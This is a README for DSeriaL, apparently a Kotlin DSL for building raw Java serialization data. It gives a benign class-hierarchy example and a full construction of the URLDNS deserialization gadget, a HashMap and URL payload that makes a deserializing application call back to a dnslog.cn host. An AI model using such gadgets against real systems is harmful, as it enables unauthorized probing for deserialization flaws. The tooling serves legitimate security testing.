/DSeriaL

Kotlin DSL for creating Java serialization data

Primary LanguageKotlin

DSeriaL (施工中)

DSeriaL 是用来构建 Java 序列化数据的 DSL(domain-specific language),代码参考 serial-builder

比如想要构建以下 Java 类的序列化数据:

public class HierarchyBase implements Serializable {
    public static final long serialVersionUID = 1L;

    public int i;

    public HierarchyBase(int i) {
        this.i = i;
    }
}

public class HierarchySub extends HierarchyBase {
    public static final long serialVersionUID = 1L;

    public char c;

    public HierarchySub(int i, char c) {
        super(i);
        this.c = c;
    }
}

可使用以下代码:

Serial {
    descriptors {
        desc {
            type = HierarchySub::class.java
            uid = HierarchySub.serialVersionUID

            "c" type Char::class.java
        }
        desc {
            type = HierarchyBase::class.java
            uid = HierarchyBase.serialVersionUID

            "i" type Int::class.java
        }
    }
    slot { prims { intVal(5) } }
    slot { prims { charVal('a') } }
}

用 DSeriaL 构造 URLDNS Gadget:

Serial {
    descriptors {
        desc {
            typeName = "java.util.HashMap"
            uid = 362498820763181265L
            flags = SC_SERIALIZABLE or SC_WRITE_METHOD

            "loadFactor" type Float::class.java
            "threshold" type Int::class.java
        }
    }
    slot {
        prims {
            floatVal(0.75f)
            intVal(12)
        }
        writeObject {
            it.write(byteArrayOf(0, 0, 0, 16, 0, 0, 0, 1))
            serialObj {
                descriptors {
                    desc {
                        typeName = "java.net.URL"
                        uid = -7627629688361524110L
                        flags = SC_SERIALIZABLE or SC_WRITE_METHOD

                        "hashCode" type Int::class.java
                        "port" type Int::class.java
                        "authority" type String::class.java
                        "file" type String::class.java
                        "host" type String::class.java
                        "protocol" type String::class.java
                        "ref" typeName "java.lang.String"
                    }
                }
                slot {
                    prims {
                        intVal(-1)
                        intVal(-1)
                    }
                    objs {
                        string("dserial.kyrvep.dnslog.cn")
                        string("")
                        string("dserial.kyrvep.dnslog.cn")
                        string("http")
                        nil()
                    }
                    writeObject {}
                }
            }
            string("http://dserial.kyrvep.dnslog.cn")
        }
    }
}